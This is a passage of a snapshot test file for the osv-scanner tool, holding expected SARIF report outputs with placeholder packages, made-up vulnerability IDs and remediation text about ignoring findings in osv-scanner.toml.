vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-3", "name": "OSV-3", "relationships": [], "shortDescription": { "markdown": "OSV-3: Something mildly scary!", "text": "OSV-3: Something mildly scary!" } }, { "deprecatedIds": [ "OSV-5" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-5", "name": "OSV-5", "relationships": [], "shortDescription": { "markdown": "OSV-5: Something scarier!", "text": "OSV-5: Something scarier!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@123abc' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@abcxyz' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-3'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-3", "ruleIndex": 2, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@123abc' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 123abc |\n| lockfile:/path/to/my/first/lockfile | mine1 | abcxyz |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 123abc |\n| lockfile:/path/to/my/first/lockfile | mine1 | abcxyz |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } }, { "deprecatedIds": [ "OSV-3" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-3", "name": "OSV-3", "relationships": [], "shortDescription": { "markdown": "OSV-3: Something mildly scary!", "text": "OSV-3: Something mildly scary!" } }, { "deprecatedIds": [ "OSV-5" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 123abc |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 123abc |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-5", "name": "OSV-5", "relationships": [], "shortDescription": { "markdown": "OSV-5: Something scarier!", "text": "OSV-5: Something scarier!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/no_sources - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_no_packages - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'GHSA-123'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "GHSA-123", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "GHSA-123" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [GHSA-123](https://osv.dev/GHSA-123)**.\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"GHSA-123\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [GHSA-123](https://osv.dev/GHSA-123)**.\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"GHSA-123\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "GHSA-123", "name": "GHSA-123", "relationships": [], "shortDescription": { "markdown": "GHSA-123: Something scarier!", "text": "GHSA-123: Something scarier!" } }, { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, 